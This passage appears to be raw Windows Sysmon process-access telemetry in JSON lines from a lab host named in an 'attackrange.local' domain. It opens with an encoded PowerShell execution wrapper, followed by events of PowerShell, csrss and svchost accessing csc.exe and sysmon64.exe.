JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5371,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-00101DCB0700}\r\nSourceProcessId: 4984\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-00101DCB0700}","SourceProcessId":"4984","SourceThreadId":"4796","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1ecb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c1999|UNKNOWN(00007FFF447BB68F)","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5372,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001090DE0700}\r\nTargetProcessId: 4108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001090DE0700}","TargetProcessId":"4108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5373,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5374,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5375,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5376,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5377,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.212","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5378,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.212\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 